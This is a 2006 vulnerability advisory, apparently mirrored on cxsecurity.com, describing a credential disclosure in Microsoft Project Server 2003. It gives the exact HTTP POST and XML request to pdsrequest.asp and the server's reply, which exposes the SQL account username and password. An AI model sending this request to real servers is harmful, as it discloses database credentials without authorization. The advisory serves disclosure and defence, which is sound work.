Bug: Project Server 2003 - Credential Disclosure (WLB-2006120115 Ascii Version)

English Version
WLB2

CVE WLB2

WLB2
Full List
Bugs
Bogus
Tricks
Exploits
CVE MAP
Full List
Vendors
Products
Tools
CWE Dictionary
Google Hacking
Search
General
CVE
CWE
RSS
Full List
Bugs
Exploits
Dorks
Information
Our services
Add note
About
Submit

To add a note,

use this form

or send email to

submit@cxsecurity.com

When contacting via email, we recommend coded messages.

Get our PGP public key

 Topic: Project Server 2003 - Credential Disclosure
 Credit: Brett Moore (brett moore security-assessment com)
 Date: 2006.12.19
 CWE: N/A
 CVE: CVE-2006-6617 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

==============================================================
% Project Server 2003 - Credential Disclosure
% brett.moore (at) security-assessment (dot) com [email concealed]
==============================================================

Microsoft Project server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server of HTTP(S).

One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.

--------------------------------------------------------------
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=<valid cookie>

<Request>
<GetInitializationData>
<Release>1</Release>
</GetInitializationData>
</Request>

<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DBType>0</DBType>
<DVR>{SQLServer}</DVR>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<ResGlobalID>1</ResGlobalID>
<ResGlobalName>resglobal</ResGlobalName>
<UserName>MSProjectUser</UserName> <----
<Password>sekretpass</Password> <----
<UserNTAccount>SERVERUSER</UserNTAccount>
</GetLoginInformation>
</Reply>
--------------------------------------------------------------

Some quick notes that mitigate this attack;
* The cookie must be a valid cookie, which is obtained via a
login with a valid username and password.
* Since the thick client is 'client side' any sql can be
manipulated anyway.
* The MSProjectUser should be a low level account anyway
* Other 'undocumented' or 'unauthorised' requests 'may' also
be able to be made through this method.

==============================================================
%
==============================================================

[ ASCII VERSION ]
Copyright 2012, cxsecurity.com